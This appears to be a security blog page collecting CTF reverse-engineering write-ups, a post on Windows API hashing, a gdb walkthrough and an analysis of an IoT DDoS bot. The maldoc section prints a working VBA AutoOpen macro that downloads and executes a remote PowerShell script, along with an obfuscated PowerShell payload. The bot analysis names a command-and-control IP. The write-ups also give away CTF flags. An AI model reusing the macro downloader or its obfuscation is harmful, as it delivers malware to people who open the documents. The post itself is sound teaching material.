02 Mar 2019

Introduction

This year for ENUSEC’s LTDH (“Le Tour Du Hack”) I was tasked with writing the reverse engineering challenges needed for the CTF aspect of the event. Last year I also wrote the reverse engineering challenges which were used, so built on the feedback that I received. However, this year I attempted to make the challenges a bit easier to capture the interest of contestants that were new to the field. If you’ve got any questions feel free to pop me a message on Twitter @LloydLabs or e-mail [email protected].

Go Fetch

I’m going to be using IDA for this writeup in conjunction with the Golang helper plugin which can be found here. We’re also given a file named fetch.dat to solve this challenge along with the executable. We can see main_main which is obviously the entry point. If we run the application we get this:

ENUMEME - Enter a string to be superly hidden using a top secret routine:

Ok, so it’s asking for user input. By looks of the message printed it seems as if it’ll possibly encrypt or encode a string in one way or another. Just for the sake of this walkthrough I’m going to reference the IDA pseudocode output (to get this view from graph or inline view, press F5) as the Golang compiler adds a lot of instructions for the runtime’s sake.

For reverse engineering reference, when we import a Go package when developing an application, and a method is called within that package (for example, fmt.Printf), the exported method will look something like: <package>_method in the binary’s function table. For example, fmt.Printf would look like fmt_Printf in disassembly. The variables passed on the left are internally used by Go. In the decompiled pseudocode view we can see our call which prints the following to the console:

fmt_Printf(a1, a2, a3, v6, a5, a6, (__int64)aEnumemeEnterAS, 73LL); aEnumemeEnterAS -> ENUMEME - Enter a string to be superly hidden using a top secret routine:

Then, we can see this input being read from STDIN:

bufio___Reader__ReadString((__int64)&v42, (unsigned __int64)&v35, v13, v14, v15, v16, (__int64)&v41);

The variable v42 is our output which has been read from STDIN, for analysis sake we’re going to change the name of this variable within IDA by pressing n whilst the variable is selected and changing the name to encrypted_string_input. We can then see this being fed into a method named encode within the main package. It seems as if we’re calling an instance of FetchCtx within main and calling Encode from it:

main___FetchCtx__Encode(
    (__int64)&encrypted_string_input,
    (__int64)&v35,
    (__int64)&v30,
    v27.m256i_i64[1],
    v17,
    v18,
    (__int64)&v30,
    v27.m256i_i64[1],
    v27.m256i_i64[2]);

In Go, the prototype for Encode will look something like this:

func (ctx *FetchCtx) Encode(data string) []byte

Let’s take a look at the encode routine. Upon inspection, an instance of zlib.NewWriter is created, then the input (in this case, our encrypted string) is compressed, as observed here:

compress_zlib___Writer__Write(a1, a2, *(__int64 *)&v44[32], v14, v15);
compress_zlib___Writer__Close(a1, a2, v16);

An instance of aes.NewCipher is then created, through taking a look at the Go documentation for this function it seems as if we input a byte array as the input which is the key. You can view the documentation for the aes library here. Let’s take a look at the generated pseudocode again:

runtime_stringtoslicebyte(a1, byte_arr_key, v20, i, v15, v16);
*((_QWORD *)&v24 + 1) = *((_QWORD *)&v35 + 1);
*(_QWORD *)&v24 = v35;
v33 = v35;
crypto_aes_NewCipher(a1, byte_arr_key, v24, v25);

The Go runtime converts a string to a byte array internally using the runtime_stringtoslicebyte. In Go, this looks something like: byteArr := []byte("syscall.party"). We can see that an array of bytes at 0x4DA5A4 is being converted. For analysis sake, lets go and rename dword_4DA5A4 to byte_arr_key.

lea     rax, dword_4DA5A4
mov     qword ptr [rsp+108h+var_108+8], rax
mov     qword ptr [rsp+108h+var_108+10h], 10h
call    runtime_stringtoslicebyte

We know this is a string, so let’s press R in IDA and select the bytes, this will convert it to the character equivalents:

Great. If it’s strange to you that this is not null terminated, this is the way that Go stores strings for optimisation purposes (if it’s small enough) - plus, internal methods will always pass the length of a buffer, meaning no need for a null terminator. We then need to reverse the order as it’s in little endian, this is when the byte order is essentially “flipped”. For example, “flipped” would become deppilf. After converting it from little endina, this then gives us a string of DER_DIE_ODER_DAS - a German phrase. So, we’ve recovered our encryption key, what’s next? We need to find the nonce that’s being used in the decryption, we can see seal is being called on our Cipher context.

We can then see main_statictmp_0 within the binary indicating an array of bytes. This is the way that Go stores static data within binaries. Let’s export this data, we can do this by highlighting the bytes then doing SHIFT + E which gives us this:

01 02 03 04 05 06 07 09 10 11 12

Ok, so this is our nonce. This would look something like this in Go:

nonce := []bytes{1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12}

Let’s now recap on what we’ve observed so far being done. It’s compressing the data using zlib, encrypting the data using AES with a key of DER_DIE_ODER_DAS and a nonce of 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12.

What about the file, fetch.dat we were given at the start? Taking a look at the content in HxD we can see it looks like simply a collection of random bytes which have no purpose, nor identifiers such as file magic:

Could this file of have been encrypted using this algorithm? Let’s find out, all we need to do is the reverse of what the algorithm above does. So let’s load the file in, decrypt it, then decompress it. We can do this in any programming language of our choice.

  1. Load the target file
  2. Decrypt the target file using the found parameters above
  3. Decompress the target file using standard zlib parameters
  4. Profit???

After following our desried methodology we’ve developed, the flag renders as:

ltdh{99754106633f94d350db34d548d6091a}


Secrecy

This challenge had the theme of a GCHQ “secure” login portal, with inputs for username and password. We can identify that it’s a .NET executable by simply throwing it into DiE which aids in identifying packers, compilers and languages used - I highly recommend you add it to your toolset if you’ve not got it already!

In order to decompile the .NET binary from CIL bytecode to readable sourcecode we’re going to use dnSpy - a great .NET disassembler, debugger and editor. Open the target file we’re looking at in dnSpy via the menu pane File -> Open - the assembly then will appear in the left hand menu view.

When a user wishes to login and clicks the Login button, the button1_click event handler is triggered:

private void button1_Click(object sender, EventArgs e)
{
  if (new Login(this.textBox1.Text, this.textBox2.Text).Verify())
  {
    Clipboard.SetText(Carrots.Decrypt());
    this.toolStripStatusLabel1.Text = "Status: OK login - copied flag to clipboard!";
    return;
  }
  this.toolStripStatusLabel1.Text = "Status: Bad login!";
}

We can see that to verify that our input login credentials are correct in some way or another, the Login class is called within the event handler - with the username and password as the respected inputs. Then, if the login is OK the method Decrypt will be called on the class Carrots with the output being copied to the current user’s clipboard. Let’s take a look at the Carrots class.

using System;
using System.IO;
using System.Security.Cryptography;
using System.Text;

namespace Secure_Login
{
	public static class Carrots
	{
		public static string Decrypt()
		{
			string result = "";
			byte[] array = Convert.FromBase64String("dATxa6TBMbpCztJwNiJfBQpCaIVQ0XjTg6lBMyJqym+Kyy0nm3SjyqYwGR2RJLLxkCbMFHQ3D95JD8tEaAYNIA==");
			using (Aes aes = Aes.Create())
			{
				Rfc2898DeriveBytes rfc2898DeriveBytes = new Rfc2898DeriveBytes("HALLO_HANS_DU_HUND", new byte[]
				{
					73,
					118,
					97,
					110,
					32,
					77,
					101,
					100,
					118,
					101,
					100,
					101,
					118
				});
				aes.Key = rfc2898DeriveBytes.GetBytes(32);
				aes.IV = rfc2898DeriveBytes.GetBytes(16);
				using (MemoryStream memoryStream = new MemoryStream())
				{
					using (CryptoStream cryptoStream = new CryptoStream(memoryStream, aes.CreateDecryptor(), CryptoStreamMode.Write))
					{
						cryptoStream.Write(array, 0, array.Length);
						cryptoStream.Close();
					}
					result = Encoding.Unicode.GetString(memoryStream.ToArray());
				}
			}
			return result;
		}

		private const string 我们必须飞向月球并返回 = "dATxa6TBMbpCztJwNiJfBQpCaIVQ0XjTg6lBMyJqym+Kyy0nm3SjyqYwGR2RJLLxkCbMFHQ3D95JD8tEaAYNIA==";
	}
}

It seems to be a routine which uses the native Aes wrapper for .NET using the key HALLO_HANS_DU_HUND (this can be observed being passed to Rfc2898DeriveBytes). The class is also obfuscated to a small extent to try and trick any budding CTF player. We can also see that the base64 string under the variable 我们必须飞向月球并返回 is set to be decrypted with this seen key. So, what could we do from here? We could extract this decompiled code from the binary and decrypt the flag ourselves using it, however we could look further into the program without going this far.

public bool Verify()
{
  string a = this.HashPassword();
  foreach (KeyValuePair<string, string> keyValuePair in AuthenticationPairs.logins)
  {
    if (this.username == keyValuePair.Key && a == keyValuePair.Value)
    {
      return true;
    }
  }
  return false;
}

The password input field is hashed with MD5 then compares it against a list of valid logins in the AuthenticationPairs static class. The implementation of this class is small and simply compares the username and password against a Dictionary<...> defined in the AuthenticationPairs class. Let’s take a look at the definition of logins.

internal static class AuthenticationPairs
{
  public static Dictionary<string, string> logins = new Dictionary<string, string>
  {
    {
      "Churchhill",
      "4ca9d3dcd2b6843e62d75eb191887cf2"
    },
    {
      "GCHQ-Admin",
      "cde2fde1fa1551a704d775ce2315915d"
    }
  };
}

Nice, we’ve got username and hash pairs. A quick lookup of the MD5 hash 4ca9d3dcd2b6843e62d75eb191887cf2 returns war. On submission, we get told by the program that the password is correct. The flag is copied to the clipboard as: ltdh{ouch_that_was_easy}

Zeucquences

Again, we’ve got a .NET executable. However, this time it is a lot more obfuscated with junk code, variable name obfuscation using random Unicode characters and method obfuscation. We can see in Main what’s being done:

private static void Main(string[] args)
{
	象会典光県思分.漂亮的裤子("Give me a sequence to unlock the magic string - ✧・゚: *✧・゚:*");
	foreach (KeyValuePair<char, bool> keyValuePair in Program.者港本転l軽事楽確表陸情囲അവരസകരമ\u0D3Eണ\u0D4D英移量開o象会典光県思分代国l間玉間)
	{
		象会典光県思分.鞋子真漂亮("What's your input?: ");
		if (象会典光県思分.漂亮的眼睛()[0] != keyValuePair.Key - '\u0001')
		{
			象会典光県思分.漂亮的裤子("Wrong input!");
			象会典光県思分.漂亮的眼睛();
			Environment.Exit(1);
		}
	}
	象会典光県思分.漂亮的裤子("Way! Nice one!");
	Console.WriteLine(为什么编程对某些人来说如此困难.你好我的名字是().ToString());
	象会典光県思分.漂亮的眼睛();
}

What’re these weird methods being called? Let’s take a look at 象会典光県思分.漂亮的裤子. It seems to be a class that simply proxies to other methods, for example 象会典光県思分.漂亮的裤子 will simply proxy to Console.Write. We can also see that Way! Nice one! is printed after this loop to show that after a sequence of successful inputs feedback is given to the user. A method is then called, then converted to a string. Let’s take a look at that method:

public static string 你好我的名字是()
{
	int num = 1337;
	ulong num2 = 60378UL;
	if ((num2 & 221UL) == 4095UL)
	{
		ulong num3;
		ulong num4;
		do
		{
			num3 = num2 >> 2;
			num4 = num2;
			num2 = num4 - 1UL;
		}
		while (num3 != num4);
	}
	num -= num;
	num ^= num;
	char[] array = 象会典光県思分.楽確表陸情(象会典光県思分.那很容易(Resources.QPOopXopkQopkAxkpoKSpokAPOkPOAKopQ139AjAkXnZXnQjkAQKXjnSXkQAlAXjnasdowqeiqAiQiuAoplXnOJWQoiJEWjoiAScxnasdpQiowEoiJNNasfdJHOoihAFpAISFjhoiwr)).ToCharArray();
	for (int i = num; i < array.Length; i++)
	{
		array[i] = 象会典光県思分.門選宅柴京調比月級術目残(array[i]);
	}
	return new string(array);
}

This seems to reference a resource within the binary, and does some maths which don’t have any effect on the main operations - simply just there to obfuscate the program even further. It then seems to build a string array, weird. Let’s continue and see if there’s an easier way to solve this challenge rather than looking at this semi-obfuscated method.

We can see that the function enumerates over a dictionary, asks for input, gets the first character of that input and then compares the input to the value that was enumerated over to char(val - 1). So, we need to input the characters in the order that they are in the dictionary: o, a, m, p, 0, 4, 1, A, M, c. We then minus 1. This then means we have to input: n,```,l, o, /, 3, 0, @, L, b` in order. Here we can see the output when we input this sequence of characters:

Give me a sequence to unlock the magic string - ???: *???:*
What's your input?: n
What's your input?: `
What's your input?: l
What's your input?: o
What's your input?: /
What's your input?: 3
What's your input?: 0
What's your input?: @
What's your input?: L
What's your input?: b
Way! Nice one!
ltdh{what_a_meme}

The flag is ltdh{what_a_meme}.

Chain

I wanted to make this challenge as if a maldoc (“malware document”) had been presented. We’re given the file cv_view_open.docx, upon opening it we’re presented with this malformed Word document:

It seems to use a social engineering method to get the user to enable macros on the document, showing a CV (“curriculum vitae”) that appears as if it’s corrupted. It then prompts the user to enable macros, let’s take a look at the macros that they’re trying to execute. We’re going to use olevba which will extract the macros from a Microsoft Office document. If you already have Python’s package manager pip installed can install it by running pip install -U oletools, otherwise find a reference to install Python. To view the embedded macros we could also simply use the Developer tab in Word, I prefer to use oletools though. This gives us an output of:

Sub ITS_LEGIT_I_SWEAR()
    Dim xHttp
    Dim bStrm
    Dim filename
    
    Set xHttp = CreateObject("Microsoft.XMLHTTP")
    xHttp.Open "GET", "http://10.42.2.19/drop.ps1", False
    xHttp.Send
    
    Set gobjBinaryOutputStream = CreateObject("Adodb.Stream")
    
    filename = "C:\Temp\" & DateDiff("s", #1/1/1970#, Now())
    
    gobjBinaryOutputStream.Type = 1
    gobjBinaryOutputStream.Open
    gobjBinaryOutputStream.write CreateObject("System.Text.ASCIIEncoding").GetBytes_4("M")
    gobjBinaryOutputStream.write CreateObject("System.Text.ASCIIEncoding").GetBytes_4("Z")
    gobjBinaryOutputStream.write xHttp.responseBody
    gobjBinaryOutputStream.savetofile filename, 2
    
    SetAttr filename, vbReadOnly + vbHidden + vbSystem
    Shell (filename)

End Sub

Sub AutoOpen()
    ITS_LEGIT_I_SWEAR
End Sub

The AutoOpen method in Office macros is called whenever, a document is opened. We can see that ITS_LEGIT_I_SWEAR is then called which downloads a file from http://10.42.2.19/drop.ps1 which is a PowerShell script as-per the extension, then drops it into C:\Temp - a pretty lame downloader. Let’s look at the PowerShell script:

 . ( $pshoMe[4]+$PsHOme[30]+'X')( (("{39}{32}{7}{17}{37}{16}{27}{6}{40}{1}{21}{10}{4}{24}{19}{34}{29}{36}{26}{2}{8}{5}{23}{13}{35}{22}{31}{0}{28}{3}{25}{38}{15}{9}{11}{14}{18}{30}{12}{20}{33}" -f ') wLJ+wLJ{
    wLJ+wLJ    oMOdewLJ+wLJcwLJ+wLJrywLJ+wLJptewLJ','=wLJ+wLJ [SywLJ+wL','ng(oMwLJ+wLJOdawLJ+wLJta)wLJ+wLJ
wLJ+wLJ
    oMwLJ+wLJOdwLJ+wLJewLJ+wLJcryptedwLJ+wLJ wLJ+wLJ= wLJ+wL','wLJrypwLJ+wLJted[oMwLJ+wLJOiwLJ+wLJ] -bxor 0xF
wLJ+wLJ  wLJ+w','LJetBytewLJ+wLJs(kwLJ+wLJ4wLJ+wLJIwLJ+wLJWAS_ZUM_HwLJ+wLJOFFEwLJ+wLJ_HANw','wLJ+','LJ+wLJMwLJ+wLJOda','(wLJ+wLJ
wLJ+wLJ       wLJ+wLJ[PwLJ+wLJarameter(Man','[email protected]()wLJ+wLJ

    for wLJ+wLJ(wLJ+wLJoMOiwLJ+wLJ = ','J+wLJ.Tex','LJ+wLJnwLJ+wLJcodwLJ+wLJinwLJ+wLJg]:wLJ+wLJ:UTFwLJ+wLJ8.wLJ+wLJGwLJ+w','t.EncodwLJ+wLJinwLJ+wLJg]:wLJ+','wLJ}wLJ).rePLace(wLJk4IwLJ,[Stri','encrwLJ+wLJ','wLJ:wLJ+wLJUTF8.GwLJ+wLJetwLJ+wLJSwLJ+wLJtrwL','LJmwL','rwLJ','datwLJ+wLJory)][stwLJ','J+wLJing(owLJ+wLJMOdecr','wLJ+wLJ

wLJ+wLJ   wLJ','ng][ChAR]34).rePLace(wLJoMOwLJ,[Strin','Jstem.wLJ+wLJText.Ew','LJ+wLJhwLJ+wLJ; owLJ+wLJMOi+','wLJ0;wLJ+wLJ wLJ+wLJoMOi -lt oMO','LJ+wLJSk4I)','LJ wLJ+wLJ }
wLJ+wLJ
    [SwLJ+wLJyswLJ+wLJtwLJ+w','LJ+wLJromwLJ+wLJBase64wLJ+wLJStri','+wLJing]wLJ+wLJow','+wLJd += oMwLJ+wLJOenwLJ+wLJcwLJ+','ted = [System.CowLJ+wLJnwLJ+wLJvewLJ+wLJrt]::F','ypted)
wLJ+','+','J+wLJ {param','g][ChAR]36) G1H& ( hdtVerBOsEpReFerencE.TOsTRINg()[1,3]+wLJXwLJ-JoinwLJwLJ)','+wLJ wLJ+wLJoMwLJ+wLJOenwLJ+wLJcrwLJ+wLJypwLJ+wLJ','ywLJ+wLJptewLJ+wLJdwLJ+wLJ.Lengtw','w','+wLJ','LJewLJ+w','(wLJfunwLJ+wLJction Get-Crypt-LwLJ+wLJadwL','tawLJ+wLJ
  wLJ+wLJ  )

  wLJ+wLJ wLJ+wLJ oMOwLJ+wLJkeywLJ+wLJ ')).rEplacE('hdt','$').rEplacE(([ChaR]71+[ChaR]49+[ChaR]72),'|').rEplacE('wLJ',[sTRIng][ChaR]39) )

# TODO: Y3trZ3RgYmhQeGdue1BgYVBqbn17Z3I=

This seems to be an obfuscated PowerShell script, however we can see a comment at the bottom which is an encoded string. We can make out certain strings such as -bxor 0xF and Base64 within. This can be seen in the following excerpt:

-bxor 0xF

Hm, so we’ve got a base64 encoded string, we can see that an XOR operation is involved. Let’s decode the string, then decrypt using 0xF as the key. For this, I’d recommend using CyberChef made by GCHQ. You can see the recipe that I used here.

Nice! This then yields the flag:

ltdh{omg_what_on_earth}


Conclusion

I tried to make these challenges as realistic and interesting as possible to captivate the interest of people who might be new to reverse engineering. However, to test the skills of people who are well-versed in the subject too. Big thanks to CuPcakeN1njA (Charlie) for setting up the CTF and ensuring it ran smoothly!

re ida golang maldoc

02 Jun 2018

Windows API resolution via hashing

Although this method of API obfuscation is relatively old, my friend who was wanting to increase his skills in the Windows sphere confronted me about a way a few malware families seem to resolve APIs. It’s pretty simple, however he could not find any documentation with a solid programming example on the matter at the time, so I thought I’d quickly write something up regarding it. I was going to write my own loader for this example (loading the desired module via LdrLoadDll within kernel32.dll, walking the InMemoryOrderModuleList to find the desired loaded module, finding the exported function we’re after within the EAT..) - however I thought this might of have been a bit overkill for such a simple concept, I want to cover writing your own PE loader in the future though as it’s an interesting subject.

If you’re not familiar with the PE format, take a look at this diagram from Microsoft - it outlines the way in which the table is structured. When EAT is mentioned, we’re referring to the export address table.

EAT diagram

So, every DLL in theory should have an export table where the functions that it implements are exposed to the loader - in order for an application for example to use one of the exported functions. This information resides in the EAT (export address table).

When you traditionally compile an executable and implicitly use for example MessageBox, the compiler will add this to this to the IAT, this will contain the module (DLL) that the symbol resides in too.

But, we’re talking about obfuscation here right? What if someone doesn’t want an analyst to see this in the export table? This is where obfuscated resolution comes in. At runtime, we can load these functions on the fly given a name - meaning they won’t reside in this pesky IAT thus making it harder to analyse (kinda ;)).

This is now how API hashing works, API hashing is when we walk a given module’s EAT looking for the name of a symbol which matches our hash we computed for it earlier. Once we get the address, we can freely use a function pointer and use the API just as normal.

In my example, I’ve decided not to use a cryptographically safe hashing routine as we just want a hashing algorithm which isn’t too computationally expensive and fast, but at the same time produces unique enough results. I’ve chosen to use SuperFastHash created by Paul Hsieh. Again, this is a trivial example of how API hashing is used in the real world, it’s not meant to be a complex example!

The code for this can be found on my Github here.

windows internal PE

12 Mar 2018

Regime walkthrough

Summary

This was the 2nd reverse engineering challenge I wrote and was meant to be an entry-level one for ENUSEC’s “Le Tour Du Hack”, and was worth 150 points. A file named login was given to the contestant. It had four solves in total.

I’ll be using gdb-peda and IDA free in this writeup. They’re both free.

Jumping in..

If we run the UNIX utility file on the binary we get this return:

login: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, not stripped

We can now see its not stripped, meaning we’ll have meaningful symbols within the binary we can relate to and that its 32 bit. Running the binary gave us a prompt where we’d have to input a password.

alt text

Ok, we can now conclude that it’s comparing our input (a string), to another input within the binary. We can assume its using strcmp, or strncmp (the safer version of strcmp). Lets take a look at it in IDA.

alt text

Looking at it in IDA, we can see a subroutine called login_show_splashscreen. Lets check it out.

alt text

Oh, ok. It’s just showing the console stuff. We can ignore this. If we go down to where we’re recieving input, this is where the password is compared so we’re interested more in this logic than anything else. We can see fgets is called, this is obviously being used to gather input from stdin (your console). Ok, now we see login_check_password, we’re passing eax to this method which is obviously the password. We can see that theres a “Welcome” message too if the password is correct, great! Lets go check this out!

alt text

Lets look at login_check_password. At the start of login_check_password it seems to be deriving different bytes from 0xDEADBABE. If we then look to another node, we can see these are referenced in some type of XOR loop where the length of our input is used (we can see a call to strlen, in x86 the result of a call will be placed in eax). Ok, so basically its now unlocking the encrypted password.

alt text

We can just ignore this routine though, its irrelevant. The strncmp we can see has to see the “cleartext” (decrypted) password some time, right? We can see theres a call to strncmp, this is obviously comparing OUR password with the DECRYPTED password.

Lets open the binary in gdb and put a breakpoint on strncmp, this way we can see whats being passed to it. Run gdb login to open it in gdb. Now, we’ll proceed to put a breakpooint on strncmp. A breakpoint is when the debugger will pause execution at a certain point. We want to stop at where our password is compared, so break strncmp or b strncmp. b is an alias for break in gdb.

Now type run or r. This will start the program. Once its loaded, input a dummy password. We should then break on strncmp where our input is compared.

alt text

We’ve input dummy_pw in this example, we can now see that its hit the breakpoint and gdb-peda has shown us the stack. In x86 with GCC, by default all of the parameters are pushed onto the stack for libc functions (C functions) unless another calling convention is used. We can see that the second parameter on the stack:

0008| 0xffffced4 --> 0xffffcefc ("enusec{lemmein}")

is here, we could also access this in GDB by printing (simply print) the location of $esp + 8 where the breakpoint is sat. Our password we input is at $esp + 4, as sizeof(WORD) in x86 is 4 - hence all addresses are 4 bytes wide (32 bits). We could also just simply do: x/s *0xffffced4 as we can see that 0xffffced4 is the address of the second parameter.

tl;dr

gdb login
b strncmp
r
# enusec{lemmein}
writeup trivial

19 Nov 2017

As the title suggests this is a bot which is spread by brute forcing SSH daemons and exploiting IoT devices using an array of exploits — this malware is mainly distributed by a Chinese actor who is familiar with C++ and C constructs, however the knowledge of C++ by this threat actor only extends to using the std::string class in C++. This bot was being distributed a few years ago just for x86_64 targets, this has changed along with some key fundementals of the bot. It’s started to target embedded systems, which is why I thought I would cover it again. Linux/AES.DDoS is programmed in C++, we can see this due to the fact that all of the symbols are exported and C++ constructs are used.

We are going to be using:

A look at the file..

If we run ‘file’ on the executable we get:

ELF 32-bit LSB executable, ARM, EABI5 version 1 (SYSV), statically linked, for GNU/Linux 2.6.14, not stripped.

So, we’re working with an ELF (which is the COFF for UNIX systems) and it’s 32 bit. It’s architecture is of type ARM and all of the libraries its using are statically linked — this is normal behaviour of an IoT bot to have its libc linked as many systems will have incomplete or sometimes even broken libraries. So, instead of dynamically linking the executable, they are statically linked. Since its not stripped, this means that the analysis will be a lot easier as we have meaningful names in relation to objects in the executable. For some strange reason, the executable was compiled on a 12 year old version of the Linux kernel — this could indicate to us that the malware was compiled on an IoT device or just has an extremely old computer.

MD5: 125679536fd4dd82106482ea1b4c1726

SHA1: 6caf6a6cf1bc03a038e878431db54c2127bfc2c1

A quick rundown on ARM

ARM is 32 bit by design, so all of our registers are 32 bit wide. In ARM, the standard calling convention is to place the arguments into r0-r3. That’s only four registers though, if there are more than three arguments then we place the rest of the arguments on the stack. We have 15 registers to play with though, they all serve a special purpose.

  • r0, r1, r2, r3 are used for passing arguments, r0 usually also holds the return value of routines.
  • r4, r5, r6, r7, r8, r9 are used internally within routines to store variables.
  • r10 holds the limit for the current stack.
  • r11 holds the stack frame pointer.
  • r12 can also be used as a variable within routines, however there is no guarantee that this register will remain unchanged by the caller.
  • r13 holds the stack pointer (SP).
  • r14 is the link register, which points back to the caller.
  • r15 holds the program counter.

Nice, so now you’re an ARM expert we can continue.. ;)

Dive into main(..)..

As soon as the malware boots from the original entry-point main which is at 0x13DEC. We use rabin2 to find the original entry point by doing rabin2 -s kfts | grep "type=FUNC name=main". Which gives us the following output:

vaddr=0x00013dec paddr=0x0000bdec ord=5366 fwd=NONE sz=688 bind=GLOBAL type=FUNC name=main

Nice! The executable isn’t packed. The main method then branches to function named get_executable_name which reads the symlink /proc/self/exe via readlink(..). When reading this symlink internally from our process it will return the location from that our executable is running from. We can see from the disassembly that we create a type of std::string and copy from the char array containing the path of the current executable. This is then used and passed into the function used for persistence.

image-title-here

We then either check if we’re running or add to startup. In the check_running procedure we do a call to ps -e then sleep for two seconds; we then get the output from the command and check to see if the current executable name exists in the output. If it does, we continue to branch to exit with an exit code of 0 (which is placed into r0) which will effectively shut-down the process. If not, we then go onto persistence. So, if we’re already running, we effectively exit the process.

image-title-here

Persistence

Persistence is achieved by the malware by adding to /etc/rc.local and the /etc/init.d/boot.local files (in the auto_boot function); however before it overwrites this file it first checks to see if it has already done so. The /etc/rc.local will execute certain commands after all of the systems’ services have started. The way that this is achieved is somewhat amateur as the malware constructs a shell command and then uses the system function to execute them (which in theory just calls the exec and hangs for a return code from the callee).

A string is formatted and the sed program is called which writes to the file in question (there are several string operations, such as sed -i -e '2 i%s/%s' /etc/rc.local is formatted for example). This is then passed to system, as described above. The buffer used in all of these formatting operations is at the virtual address 0x9F48 and has a size of 300 bytes. Technically, since the input is un-sanitized we could manipulate the path that the malware resides in and utilise a format string exploit. We could therefore manipulate the stack; read local variables, overwrite addresses etc. This is the only persistence method used by the bot.

image-title-here

Information harvesting

The process then forks itself and breaks away from its parent by calling setsid(..). All of the file descriptors are also closed which are inherited from the parent (0-3). A thread is then created to call the SendInfo function which collects information such as the number of CPUs in the system; the network speed; the amount of load on the system CPUs; the local address of the network adapter.

This routine then calls the subroutine get_occupy. We can see that we calculate the load average by iterating over all the CPUs in the system. We can see that r3 is being used for the counter for this loop, then the blt instruction is executed which branches if the first operand is less than the second. In x86, this is the equivalent of jle. Please note in earlier versions of this malware a thread used to be created to backdoorA, however not anymore.

image-title-here

The way the malware gets information regarding the network adapter is reading the /proc/net/dev file. It then seeks to the start of the file; and parses it to get the local IP address from the default adapter.

What I found strange about this sample of malware is that it created statistics which had no real meaning, for example it would create a random value and use it as the network speed. In the subroutine fake_net_speed we can see srandom is seeded with time — we pass the first parameter ‘0’ into time as we have no structure to fill (usually, a pointer to time_t would be passed into this function). We then move the result of time into r3; then back into r0 to be a parameter for srandom — this is most likely the compiler being strange for some reason or another.

image-title-here

The value generated by this call is then used in a sprintf statement to create a string which represents the network speed in mega bytes per second (apparently). This is super weird, the malware is creating a fake network speed for some reason.. the only conclusion I can come to regarding this is that someone has hired a programmer and they have failed to implement this feature — so they’re faking it to their client/boss etc.

These values are then sent within this subroutine to the main C2..

Communication Initialisation

After all of these operations we finally come to the main core of the bot; the part where it connects to the C2 and receives commands. The procedure ConnectServer (which is at 0xCA1C) is called from the main body of the function, this then branches to ServerConnectCli (0xB5BC) which returns a socket to the C2 server. The global variable MainSocket is then set to this value. Diving into ServerConnectCli..

ServerConnectCli starts by creating a socket of protocol type TCP, if this operation is not successful then the assembly branches off to a subroutine at 0xB654 which displays the error by calling the perror(..) function to display a human readable error.

image-title-here

For those of you familiar with C, this is like doing:

r0 = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);

The port that we are going to connect to is partly obfuscated by the author. The original number is loaded into the register r3. We then shift this value by 16 bytes (0x10) to the left (we can see this being done in the lsl instruction. We then shift is again to the right by 16 bytes. Then again, this may of have been put in there by the compiler. I’ve put the assembly down below so you can see clearly whats happening.

mov r3, r0
strh r3, [r3, #0x104]
lsl r3, r3, #0x10 // shift r3 RIGHT by 0x10
lrl r3, r3, #0x10 // shift r3 LEFT by 0x10
mov r0, r3
bl htons

Could look at it this way in pseudocode..

r3 = ((r3 << 0x10) >> 0x10)

The bot has a symbol named AnalysisAddress at at 0xB1B8, at first sight one may think this is to divert the attention of researchers — but all this subroutine does is setup a hostent struct (http://man7.org/linux/man-pages/man3/gethostbyname.3.html) which we’ll use later on for the connection. We pass in the first parameter in the register ‘r0’ from the location 0xC1FC8 which has the value of 61.147.91.53. We put the return value os gethostbyname into register r3 then preform some arithmetic on it.

The malware does two calls to setsockopt, passing the IP_DROP_SOURCE_MEMBERSHIP flag and the After the above has completed the the malware does a call to connect to make an initial connection to the C2 server and then does a mixture of select and getsockopt calls on the socket to ensure that the non-blocking socket has successfully connected. If the connection is not successful the malware will close the socket and exit.

Once we have a working socket returned from ServerConnectCli we then set the value of the global variable MainSocket to the return value. The malware then goes on to getting more statistics from the infected box. First of all, it grabs the username from the user running the executable which is placed into ‘r11’. We can see that if the ‘uname’ call fails then “Unknown” will be copied into the destination buffer which originally resided in r11, else if it is successful, will branch to 0xCA8C.

image-title-here

More information is gathered about the infected host via the GetCpuInfo function. Although this is self explanatory I’ll explain it anyways. The virtual file /proc/cpuinfo is opened and read in WORDs until an EOF (-1) is hit whilst reading the file chunk by chunk — then fclose is called to free up the opened file. The number of CPUs is then passed back out from this method and the clock speed in MHz too.

The malware then calls sysinfo(..) and reads into the struct (also named sysinfo) which is originally located in r3. We then read several members of this struct, such as the total amount of swap, total amount of RAM etc.. this is all then formatted and output into a string.

We can see here that the threat actor seems to be joking about by using the string ‘Hacker’.. the string to be format is: VERSONEX:Linux-%s|%d|%d MHz|%dMB|%dMB|%s — you’ve spelt ‘version’ wrong Mr Threat Actor. It’s very strange here that sprintf was used before rather than snprintf (which helps mitigate buffer overflows/format string exploits to an extent as the function knows the length of the buffer). Programmers will usually be inclined to use one naturally over the other, this indicates to myself there may be more than one programmer whom is contributing to this malware.

In the control flow we can then see that we try to then send this information on ‘MainSocket’, if the send is not successful (so, if we send 0) we branch to another subroutine and close the socket.

image-title-here

For those not familiar with ARM, the beq instruction basically says if the flag is set that they are equal then jump to address 0xCBD4. This subroutine simply closes the socket, as said before. We then move onto select, if this call is successful thence move onto reading data from the C2. We then read data from the C2, but first, we zero out the buffer that we are using and have a maximum size of 0x1380 that we want to receive. Again, if this is not successful it then prints an error message and branches to a subroutine which closes the socket and cleans up.

Conclusion, so far..

It is obvious so far that this malware has been programmed by more than one author. We can also see so far that the author has experience in socket programming. The author is also using pascal case (LikeThis) and names certain functions such as GetCpuInfo – this could in turn indicate to us that the author is used to programming on Windows.

This is the end of this section, we will now move onto the details about the attack methods and what else the bot can be commanded to do.

malware iot